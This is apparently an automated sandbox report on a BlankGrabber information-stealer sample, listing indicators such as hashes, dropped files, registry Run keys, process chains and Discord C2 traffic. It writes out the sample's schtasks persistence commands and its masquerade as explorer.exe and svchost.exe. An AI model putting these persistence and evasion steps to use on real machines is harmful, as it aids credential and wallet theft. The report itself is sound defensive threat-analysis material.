Malware Analysis Report

2024-10-10 08:21

Sample ID 240603-h7ha6ahb33
Target Bootloader.exe
SHA256 9145a2820d02861ab749bdb94dcbe432e3fdd414ec7d409b4e4317f744f08761
Tags
blankgrabber evasion persistence upx execution spyware stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

9145a2820d02861ab749bdb94dcbe432e3fdd414ec7d409b4e4317f744f08761

Threat Level: Known bad

The file Bootloader.exe was found to be: Known bad.

Malicious Activity Summary

blankgrabber evasion persistence upx execution spyware stealer

A stealer written in Python and packaged with Pyinstaller

Modifies visiblity of hidden/system files in Explorer

Blankgrabber family

Command and Scripting Interpreter: PowerShell

UPX packed file

Loads dropped DLL

Executes dropped EXE

Reads user/profile data of web browsers

Accesses cryptocurrency files/wallets, possible credential harvesting

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Adds Run key to start application

Drops file in System32 directory

Drops file in Windows directory

Unsigned PE

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Detects videocard installed

Suspicious use of WriteProcessMemory

Creates scheduled task(s)

Enumerates processes with tasklist

Gathers system information

Suspicious use of SetWindowsHookEx

Suspicious behavior: GetForegroundWindowSpam

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-06-03 07:22

Signatures

A stealer written in Python and packaged with Pyinstaller

Description Indicator Process Target
N/A N/A N/A N/A

Blankgrabber family

blankgrabber

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-06-03 07:22

Reported

2024-06-03 07:25

Platform

win7-20240508-en

Max time kernel

150s

Max time network

122s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Bootloader.exe"

Signatures

Modifies visiblity of hidden/system files in Explorer

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" \??\c:\windows\resources\themes\explorer.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2737914667-933161113-3798636211-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" \??\c:\windows\resources\svchost.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\Explorer = "c:\\windows\\resources\\themes\\explorer.exe RO" \??\c:\windows\resources\themes\explorer.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\Svchost = "c:\\windows\\resources\\svchost.exe RO" \??\c:\windows\resources\themes\explorer.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\Explorer = "c:\\windows\\resources\\themes\\explorer.exe RO" \??\c:\windows\resources\svchost.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\Svchost = "c:\\windows\\resources\\svchost.exe RO" \??\c:\windows\resources\svchost.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\explorer.exe \??\c:\windows\resources\themes\explorer.exe N/A
File opened for modification C:\Windows\SysWOW64\explorer.exe \??\c:\windows\resources\svchost.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Resources\Themes\icsys.icn.exe C:\Users\Admin\AppData\Local\Temp\Bootloader.exe N/A
File opened for modification \??\c:\windows\resources\themes\explorer.exe C:\Windows\Resources\Themes\icsys.icn.exe N/A
File opened for modification \??\c:\windows\resources\spoolsv.exe \??\c:\windows\resources\themes\explorer.exe N/A
File opened for modification \??\c:\windows\resources\svchost.exe \??\c:\windows\resources\spoolsv.exe N/A
File opened for modification C:\Windows\Resources\tjud.exe \??\c:\windows\resources\themes\explorer.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Bootloader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Bootloader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Bootloader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Bootloader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Bootloader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Bootloader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Bootloader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Bootloader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Bootloader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Bootloader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Bootloader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Bootloader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Bootloader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Bootloader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Bootloader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Bootloader.exe N/A
N/A N/A C:\Windows\Resources\Themes\icsys.icn.exe N/A
N/A N/A C:\Windows\Resources\Themes\icsys.icn.exe N/A
N/A N/A C:\Windows\Resources\Themes\icsys.icn.exe N/A
N/A N/A C:\Windows\Resources\Themes\icsys.icn.exe N/A
N/A N/A C:\Windows\Resources\Themes\icsys.icn.exe N/A
N/A N/A C:\Windows\Resources\Themes\icsys.icn.exe N/A
N/A N/A C:\Windows\Resources\Themes\icsys.icn.exe N/A
N/A N/A C:\Windows\Resources\Themes\icsys.icn.exe N/A
N/A N/A C:\Windows\Resources\Themes\icsys.icn.exe N/A
N/A N/A C:\Windows\Resources\Themes\icsys.icn.exe N/A
N/A N/A C:\Windows\Resources\Themes\icsys.icn.exe N/A
N/A N/A C:\Windows\Resources\Themes\icsys.icn.exe N/A
N/A N/A C:\Windows\Resources\Themes\icsys.icn.exe N/A
N/A N/A C:\Windows\Resources\Themes\icsys.icn.exe N/A
N/A N/A C:\Windows\Resources\Themes\icsys.icn.exe N/A
N/A N/A C:\Windows\Resources\Themes\icsys.icn.exe N/A
N/A N/A C:\Windows\Resources\Themes\icsys.icn.exe N/A
N/A N/A \??\c:\windows\resources\themes\explorer.exe N/A
N/A N/A \??\c:\windows\resources\themes\explorer.exe N/A
N/A N/A \??\c:\windows\resources\themes\explorer.exe N/A
N/A N/A \??\c:\windows\resources\themes\explorer.exe N/A
N/A N/A \??\c:\windows\resources\themes\explorer.exe N/A
N/A N/A \??\c:\windows\resources\themes\explorer.exe N/A
N/A N/A \??\c:\windows\resources\themes\explorer.exe N/A
N/A N/A \??\c:\windows\resources\themes\explorer.exe N/A
N/A N/A \??\c:\windows\resources\themes\explorer.exe N/A
N/A N/A \??\c:\windows\resources\themes\explorer.exe N/A
N/A N/A \??\c:\windows\resources\themes\explorer.exe N/A
N/A N/A \??\c:\windows\resources\themes\explorer.exe N/A
N/A N/A \??\c:\windows\resources\themes\explorer.exe N/A
N/A N/A \??\c:\windows\resources\themes\explorer.exe N/A
N/A N/A \??\c:\windows\resources\themes\explorer.exe N/A
N/A N/A \??\c:\windows\resources\themes\explorer.exe N/A
N/A N/A \??\c:\windows\resources\svchost.exe N/A
N/A N/A \??\c:\windows\resources\svchost.exe N/A
N/A N/A \??\c:\windows\resources\svchost.exe N/A
N/A N/A \??\c:\windows\resources\svchost.exe N/A
N/A N/A \??\c:\windows\resources\svchost.exe N/A
N/A N/A \??\c:\windows\resources\svchost.exe N/A
N/A N/A \??\c:\windows\resources\svchost.exe N/A
N/A N/A \??\c:\windows\resources\svchost.exe N/A
N/A N/A \??\c:\windows\resources\svchost.exe N/A
N/A N/A \??\c:\windows\resources\svchost.exe N/A
N/A N/A \??\c:\windows\resources\svchost.exe N/A
N/A N/A \??\c:\windows\resources\svchost.exe N/A
N/A N/A \??\c:\windows\resources\svchost.exe N/A
N/A N/A \??\c:\windows\resources\svchost.exe N/A
N/A N/A \??\c:\windows\resources\svchost.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A \??\c:\windows\resources\themes\explorer.exe N/A
N/A N/A \??\c:\windows\resources\svchost.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1500 wrote to memory of 3060 N/A C:\Users\Admin\AppData\Local\Temp\Bootloader.exe \??\c:\users\admin\appdata\local\temp\bootloader.exe 
PID 1500 wrote to memory of 3060 N/A C:\Users\Admin\AppData\Local\Temp\Bootloader.exe \??\c:\users\admin\appdata\local\temp\bootloader.exe 
PID 1500 wrote to memory of 3060 N/A C:\Users\Admin\AppData\Local\Temp\Bootloader.exe \??\c:\users\admin\appdata\local\temp\bootloader.exe 
PID 1500 wrote to memory of 3060 N/A C:\Users\Admin\AppData\Local\Temp\Bootloader.exe \??\c:\users\admin\appdata\local\temp\bootloader.exe 
PID 3060 wrote to memory of 2856 N/A \??\c:\users\admin\appdata\local\temp\bootloader.exe  \??\c:\users\admin\appdata\local\temp\bootloader.exe 
PID 3060 wrote to memory of 2856 N/A \??\c:\users\admin\appdata\local\temp\bootloader.exe  \??\c:\users\admin\appdata\local\temp\bootloader.exe 
PID 3060 wrote to memory of 2856 N/A \??\c:\users\admin\appdata\local\temp\bootloader.exe  \??\c:\users\admin\appdata\local\temp\bootloader.exe 
PID 1500 wrote to memory of 2232 N/A C:\Users\Admin\AppData\Local\Temp\Bootloader.exe C:\Windows\Resources\Themes\icsys.icn.exe
PID 1500 wrote to memory of 2232 N/A C:\Users\Admin\AppData\Local\Temp\Bootloader.exe C:\Windows\Resources\Themes\icsys.icn.exe
PID 1500 wrote to memory of 2232 N/A C:\Users\Admin\AppData\Local\Temp\Bootloader.exe C:\Windows\Resources\Themes\icsys.icn.exe
PID 1500 wrote to memory of 2232 N/A C:\Users\Admin\AppData\Local\Temp\Bootloader.exe C:\Windows\Resources\Themes\icsys.icn.exe
PID 2232 wrote to memory of 1832 N/A C:\Windows\Resources\Themes\icsys.icn.exe \??\c:\windows\resources\themes\explorer.exe
PID 2232 wrote to memory of 1832 N/A C:\Windows\Resources\Themes\icsys.icn.exe \??\c:\windows\resources\themes\explorer.exe
PID 2232 wrote to memory of 1832 N/A C:\Windows\Resources\Themes\icsys.icn.exe \??\c:\windows\resources\themes\explorer.exe
PID 2232 wrote to memory of 1832 N/A C:\Windows\Resources\Themes\icsys.icn.exe \??\c:\windows\resources\themes\explorer.exe
PID 1832 wrote to memory of 1612 N/A \??\c:\windows\resources\themes\explorer.exe \??\c:\windows\resources\spoolsv.exe
PID 1832 wrote to memory of 1612 N/A \??\c:\windows\resources\themes\explorer.exe \??\c:\windows\resources\spoolsv.exe
PID 1832 wrote to memory of 1612 N/A \??\c:\windows\resources\themes\explorer.exe \??\c:\windows\resources\spoolsv.exe
PID 1832 wrote to memory of 1612 N/A \??\c:\windows\resources\themes\explorer.exe \??\c:\windows\resources\spoolsv.exe
PID 1612 wrote to memory of 1280 N/A \??\c:\windows\resources\spoolsv.exe \??\c:\windows\resources\svchost.exe
PID 1612 wrote to memory of 1280 N/A \??\c:\windows\resources\spoolsv.exe \??\c:\windows\resources\svchost.exe
PID 1612 wrote to memory of 1280 N/A \??\c:\windows\resources\spoolsv.exe \??\c:\windows\resources\svchost.exe
PID 1612 wrote to memory of 1280 N/A \??\c:\windows\resources\spoolsv.exe \??\c:\windows\resources\svchost.exe
PID 1280 wrote to memory of 1736 N/A \??\c:\windows\resources\svchost.exe \??\c:\windows\resources\spoolsv.exe
PID 1280 wrote to memory of 1736 N/A \??\c:\windows\resources\svchost.exe \??\c:\windows\resources\spoolsv.exe
PID 1280 wrote to memory of 1736 N/A \??\c:\windows\resources\svchost.exe \??\c:\windows\resources\spoolsv.exe
PID 1280 wrote to memory of 1736 N/A \??\c:\windows\resources\svchost.exe \??\c:\windows\resources\spoolsv.exe
PID 1832 wrote to memory of 2324 N/A \??\c:\windows\resources\themes\explorer.exe C:\Windows\Explorer.exe
PID 1832 wrote to memory of 2324 N/A \??\c:\windows\resources\themes\explorer.exe C:\Windows\Explorer.exe
PID 1832 wrote to memory of 2324 N/A \??\c:\windows\resources\themes\explorer.exe C:\Windows\Explorer.exe
PID 1832 wrote to memory of 2324 N/A \??\c:\windows\resources\themes\explorer.exe C:\Windows\Explorer.exe
PID 1280 wrote to memory of 2088 N/A \??\c:\windows\resources\svchost.exe C:\Windows\SysWOW64\schtasks.exe
PID 1280 wrote to memory of 2088 N/A \??\c:\windows\resources\svchost.exe C:\Windows\SysWOW64\schtasks.exe
PID 1280 wrote to memory of 2088 N/A \??\c:\windows\resources\svchost.exe C:\Windows\SysWOW64\schtasks.exe
PID 1280 wrote to memory of 2088 N/A \??\c:\windows\resources\svchost.exe C:\Windows\SysWOW64\schtasks.exe
PID 1280 wrote to memory of 1912 N/A \??\c:\windows\resources\svchost.exe C:\Windows\SysWOW64\schtasks.exe
PID 1280 wrote to memory of 1912 N/A \??\c:\windows\resources\svchost.exe C:\Windows\SysWOW64\schtasks.exe
PID 1280 wrote to memory of 1912 N/A \??\c:\windows\resources\svchost.exe C:\Windows\SysWOW64\schtasks.exe
PID 1280 wrote to memory of 1912 N/A \??\c:\windows\resources\svchost.exe C:\Windows\SysWOW64\schtasks.exe
PID 1280 wrote to memory of 2044 N/A \??\c:\windows\resources\svchost.exe C:\Windows\SysWOW64\schtasks.exe
PID 1280 wrote to memory of 2044 N/A \??\c:\windows\resources\svchost.exe C:\Windows\SysWOW64\schtasks.exe
PID 1280 wrote to memory of 2044 N/A \??\c:\windows\resources\svchost.exe C:\Windows\SysWOW64\schtasks.exe
PID 1280 wrote to memory of 2044 N/A \??\c:\windows\resources\svchost.exe C:\Windows\SysWOW64\schtasks.exe

Processes

C:\Users\Admin\AppData\Local\Temp\Bootloader.exe

"C:\Users\Admin\AppData\Local\Temp\Bootloader.exe"

\??\c:\users\admin\appdata\local\temp\bootloader.exe 

c:\users\admin\appdata\local\temp\bootloader.exe 

\??\c:\users\admin\appdata\local\temp\bootloader.exe 

c:\users\admin\appdata\local\temp\bootloader.exe 

C:\Windows\Resources\Themes\icsys.icn.exe

C:\Windows\Resources\Themes\icsys.icn.exe

\??\c:\windows\resources\themes\explorer.exe

c:\windows\resources\themes\explorer.exe

\??\c:\windows\resources\spoolsv.exe

c:\windows\resources\spoolsv.exe SE

\??\c:\windows\resources\svchost.exe

c:\windows\resources\svchost.exe

\??\c:\windows\resources\spoolsv.exe

c:\windows\resources\spoolsv.exe PR

C:\Windows\Explorer.exe

C:\Windows\Explorer.exe

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn "svchost" /tr "c:\windows\resources\svchost.exe" /sc daily /st 07:24 /f

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn "svchost" /tr "c:\windows\resources\svchost.exe" /sc daily /st 07:25 /f

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn "svchost" /tr "c:\windows\resources\svchost.exe" /sc daily /st 07:26 /f

Network

N/A

Files

memory/1500-0-0x0000000000400000-0x000000000041F000-memory.dmp

\Users\Admin\AppData\Local\Temp\bootloader.exe 

MD5 c5f60a168ec3742ed37014166d488f29
SHA1 fd291b39f1238b740a13af5bddafa4fa1dcc276e
SHA256 04bec57f279eb39b6abc2a78fb6a4191f25982384fd42d1b1f9ef1036e9961ef
SHA512 a7376175af57b644446ab04b5d3e1ea5a54ed05084b0f0dcb87f5f8f314847a8f948d89fa87305df955e915e1c799daa842782079934cc281615a3c7d9343570

C:\Users\Admin\AppData\Local\Temp\_MEI30602\ucrtbase.dll

MD5 de4f74fd58a8ea32a956eac6d1eab5ef
SHA1 845ecad6a68993dcdff53ae34fea7ac85cc41d65
SHA256 37b6d4d11c20f2b0c693474cf0b7a61b568ea0c9c93f5a1e0eb6c780dd1e5edc
SHA512 d46d47471026c49fb4e44e8ecd8f37bb097a27b0a8984d596e85814905d34e2c950188b817405e94a2ee22d5c42328908218dcd91c16d86e5bd863eb5feadc24

C:\Users\Admin\AppData\Local\Temp\_MEI30602\api-ms-win-core-file-l1-2-0.dll

MD5 9d8413744097196f92327f632a85acee
SHA1 dfc07f5e5a0634dd1f15fdc9ff9731748fbff919
SHA256 6878d8168d5cc159efe58f14e5ba10310d99b53ab8495521e54c966994dac50b
SHA512 a8f6e9ee1c5d65f68b8b20d406d3e666c186e15cb3b92575257b5637fe7dd5ac7d75e9ad51c839ba4490512f68f6b48822fc9edd316dd7625d3627d3b975fb2a

C:\Users\Admin\AppData\Local\Temp\_MEI30602\api-ms-win-core-localization-l1-2-0.dll

MD5 b402ed77d6f31d825bda175dbc0c4f92
SHA1 1f2a4b8753b3aae225feac5487cc0011b73c0eb7
SHA256 6ed17fb3ca5156b39fbc1ef7d1eefa95e739857607de4cd8d41cecfcd1350705
SHA512 ec04013139f3fd9dbf22b92121d82b2eb97e136f8619790cde2d0b660280e838962f9006d3e4c3a359627b017f2b6ade7edff3bbc26e559c3de37540585602d9

C:\Users\Admin\AppData\Local\Temp\_MEI30602\api-ms-win-core-processthreads-l1-1-1.dll

MD5 3d872be898581f00d0310d7ab9abaf2b
SHA1 420e0ab98bb748723130de414f0ffed117ef3f7e
SHA256 4de821884cbef4182b29d8c33cfe13e43e130ad58ee1281679e8d40a2edcb8ea
SHA512 35cfb9888a5f4299403a0d9c57f0ba79e3625431a9acc5e04ae2ae101b3dc521a0dcff5d4a1bf508b25dbf05dd432f6987d860ff494d15538ed95673a8b7376b

C:\Users\Admin\AppData\Local\Temp\_MEI30602\api-ms-win-core-timezone-l1-1-0.dll

MD5 6c180c8de3ecf27de7a5812ff055737e
SHA1 3aad20b71bb374bb2c5f7431a1b75b60956a01fd
SHA256 630466fd77ac7009c947a8370a0d0c20652169824c54ddcb8c05e8df45e23197
SHA512 e4aa79eb2b6b3be9b545e8cb8b43cd6052036dc5cce7077be40441b9942931b30d76c475d550a178d4e94c9c366cabc852f500e482b7fdcd361fc2a08e41c00e

C:\Users\Admin\AppData\Local\Temp\_MEI30602\api-ms-win-core-file-l2-1-0.dll

MD5 361c6bcfcea263749419b0fbed7a0ce8
SHA1 03db13108ce9d5fc01cecf3199619ffbccbd855a
SHA256 b74aefd6fa638be3f415165c8109121a2093597421101abc312ee7ffa1130278
SHA512 aa8b585000cc65f9841b938e4523d91d8f6db650e0b4bb11efd740c27309bf81cdb77f05d0beda2489bf26f4fbc6d02c93ce3b64946502e2c044eea89696cc76

C:\Users\Admin\AppData\Local\Temp\_MEI30602\python312.dll

MD5 cbd02b4c0cf69e5609c77dfd13fba7c4
SHA1 a3c8f6bfd7ffe0783157e41538b3955519f1e695
SHA256 ecef0ed97c7b249af3c56cde0bfcae70f66530d716b48b5d94621c3dba8236b5
SHA512 a3760ecaa9736eb24370a0a20dd22a1ee53b3f8002195947bc7d21b239278ec8e26bcc131d0132c530767d1de59954be7946dcf54fcbf2584052c9d9a5615567

memory/2856-87-0x000007FEF5940000-0x000007FEF6019000-memory.dmp

\Windows\Resources\Themes\icsys.icn.exe

MD5 698d88fb05d36d26529983acaf2388dc
SHA1 34f64d655ed924588379609405645ecfc7af51e1
SHA256 69a15479cd6aa029c4af5752cac50035f13fc4e7500caa05b89ff854d9fade4d
SHA512 91da0b5fa4efe98b7a1ed06ebf8e26f7c1a2dc23d95433a355f307a4ef27ef1a455cbf8648e4825171e5ebfd6cb44a184d44221da4b8f5fa603611b426baed18

C:\Windows\Resources\Themes\explorer.exe

MD5 a07d08c3b74bbac55a8bb7861260eb9a
SHA1 aa8716a5f5bf22e922597f0dbf851defdd22f946
SHA256 47b173a965a4be9fc3e79c16b12559cb51af278dfe8bec3d3cee089d37514ec6
SHA512 9e89a744585756128191c3f371a23f642acd2d453e622bd4ab82b6b25458814b50437315593941fafdb2d709d500d51ce03d8f00b86387478e51c96d183bca4f

\Windows\Resources\spoolsv.exe

MD5 7a17b928dc5ad5b32c98d4f37ae26104
SHA1 3423abf369bf7891e35327629d2fc7509b361e1d
SHA256 c087cf47d439f83ea8576e50795dd8fbfe9510c79715bc8712d7d7cd8114e112
SHA512 4dd7ee88fbaa8dad706bde12580a2de3551e30a181a1f25fe150f04ac4214690173d5bafdfe88924d0ba090e74e5afe4f88f0816e90f2419eb33665410c1b9bf

memory/1612-171-0x0000000000400000-0x000000000041F000-memory.dmp

\Windows\Resources\svchost.exe

MD5 8c04e065dc1d4873d49c8af7fa30fd30
SHA1 fc8768112400f7996980086a7f497d6757636309
SHA256 cfd5b8769db8b8ad278b0ee74ab144424dad54c73c9b0c771f4302c636a6fe80
SHA512 cbf102aec94619584f68b3f927a1d9694ad06417830d2f7d5655a803eb564a7f02bc54a566220477644fbb42d56aa302380f292e4774d8fb8bae909251956765

memory/1280-185-0x00000000003E0000-0x00000000003FF000-memory.dmp

memory/1736-189-0x0000000000400000-0x000000000041F000-memory.dmp

memory/1612-190-0x0000000000400000-0x000000000041F000-memory.dmp

memory/2232-191-0x0000000000400000-0x000000000041F000-memory.dmp

memory/1500-192-0x0000000000400000-0x000000000041F000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-03 07:22

Reported

2024-06-03 07:25

Platform

win10v2004-20240508-en

Max time kernel

150s

Max time network

151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Bootloader.exe"

Signatures

Modifies visiblity of hidden/system files in Explorer

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" \??\c:\windows\resources\themes\explorer.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3558294865-3673844354-2255444939-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" \??\c:\windows\resources\svchost.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Reads user/profile data of web browsers

spyware stealer

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\Explorer = "c:\\windows\\resources\\themes\\explorer.exe RO" \??\c:\windows\resources\themes\explorer.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\Svchost = "c:\\windows\\resources\\svchost.exe RO" \??\c:\windows\resources\themes\explorer.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\Explorer = "c:\\windows\\resources\\themes\\explorer.exe RO" \??\c:\windows\resources\svchost.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\Svchost = "c:\\windows\\resources\\svchost.exe RO" \??\c:\windows\resources\svchost.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A discord.com N/A N/A
N/A discord.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\explorer.exe \??\c:\windows\resources\themes\explorer.exe N/A
File opened for modification C:\Windows\SysWOW64\explorer.exe \??\c:\windows\resources\svchost.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Resources\Themes\icsys.icn.exe C:\Users\Admin\AppData\Local\Temp\Bootloader.exe N/A
File opened for modification \??\c:\windows\resources\themes\explorer.exe C:\Windows\Resources\Themes\icsys.icn.exe N/A
File opened for modification \??\c:\windows\resources\spoolsv.exe \??\c:\windows\resources\themes\explorer.exe N/A
File opened for modification \??\c:\windows\resources\svchost.exe \??\c:\windows\resources\spoolsv.exe N/A
File opened for modification C:\Windows\Resources\tjud.exe \??\c:\windows\resources\themes\explorer.exe N/A

Enumerates physical storage devices

Detects videocard installed

Description Indicator Process Target
N/A N/A C:\Windows\System32\Wbem\WMIC.exe N/A

Enumerates processes with tasklist

Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A

Gathers system information

Description Indicator Process Target
N/A N/A C:\Windows\system32\systeminfo.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Bootloader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Bootloader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Bootloader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Bootloader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Bootloader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Bootloader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Bootloader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Bootloader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Bootloader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Bootloader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Bootloader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Bootloader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Bootloader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Bootloader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Bootloader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Bootloader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Bootloader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Bootloader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Bootloader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Bootloader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Bootloader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Bootloader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Bootloader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Bootloader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Bootloader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Bootloader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Bootloader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Bootloader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Bootloader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Bootloader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Bootloader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Bootloader.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
